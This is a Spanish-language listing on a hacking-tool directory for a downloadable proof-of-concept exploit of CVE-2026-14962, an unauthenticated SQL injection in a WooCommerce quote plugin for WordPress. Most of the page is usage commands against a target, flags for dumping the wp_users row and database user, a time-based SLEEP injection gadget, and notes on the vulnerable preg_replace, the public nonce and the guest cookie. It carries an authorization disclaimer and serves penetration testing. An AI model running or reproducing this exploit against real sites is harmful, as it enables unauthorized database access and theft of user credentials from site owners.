Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-14962 — Plugin de Wordpress ELEX WooCommerce Request a Quote inyección SQL no autenticada | Kitploit
Herramientas/GitHubGitHub/cflowsec/cve-2026-14962
Escáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubcflowsec/cve-2026-14962

CVE-2026-14962

Plugin de Wordpress ELEX WooCommerce Request a Quote inyección SQL no autenticada

Ver Repositorio
hace 9h 57mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-14962

Inyección SQL no autenticada en el plugin de WordPress ELEX WooCommerce Request a Quote

ELEX WooCommerce Request a Quote (plugin de WordPress elex-request-a-quote) ≤ 2.4.0 — inyección SQL no autenticada a través de la acción AJAX pública elex_raq_add_to_quote.

Solo para pruebas autorizadas. No ejecutes esto contra sistemas que no sean de tu propiedad o que no tengas permiso para probar.

Requiere: Python 3, solo biblioteca estándar. El objetivo debe ejecutar WooCommerce (los scripts/nonce de cotización se imprimen en la página de la tienda/inicio).

root@kitploit:~
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u https://TARGET --test --insecure
python3 cve-2026-14962-elex-raq-sqli.py -u TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump --pid 11
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sleep 3
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sql 'OR JSON_ARRAY(SLEEP(3)))#'
FlagQué hace
-u / --urlRaíz del sitio WordPress (obligatorio). http:// o https://; un nombre de host se prueba primero como HTTPS y luego como HTTP. El TLS autofirmado se reintenta automáticamente. --insecure omite la verificación desde el principio
--testInvitado: versión del plugin + nonce público, luego una sonda SQL no destructiva de $0
--dumpPrimera fila de wp_users + usuario de la BD. Necesita WP_DEBUG para que el error XPATH esté en el cuerpo HTTP
--query SQLTu propia expresión SQL (sin comillas simples; usa hexadecimal 0x… para cadenas)
--sql EXPRdata[id] sin procesar después del escape de $0$0 (tú escribes el gadget ) OR … #)
--sleep NIntento de SLEEP(N) basado en tiempo
--pid / --vidIDs de producto / variación de WooCommerce (la variación debe ser no vacía para alcanzar el sink)
--insecureOmitir la verificación TLS
--timeoutSegundos de timeout HTTP (por defecto 30)

No autenticado. El nonce se imprime en request_a_quote_ajax_obj en / y /shop/. La cookie de invitado es request_a_quote_user_coockie (la ortografía del plugin).

--test envía por POST attribute_value=$0. El preg_replace vulnerable de 2.4.0 trata $0 como la coincidencia de %s y deja un %d literal en la consulta. 2.4.1 vincula JSON_CONTAINS y $0 es solo un valor JSON.

Stdout: VERSION, NONCE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, NO_NONCE, NO_DUMP, SQLERR, SLEEP.

CVE: CVE-2026-14962. Changelog del plugin 2.4.1.

Working PoC

Descargar herramienta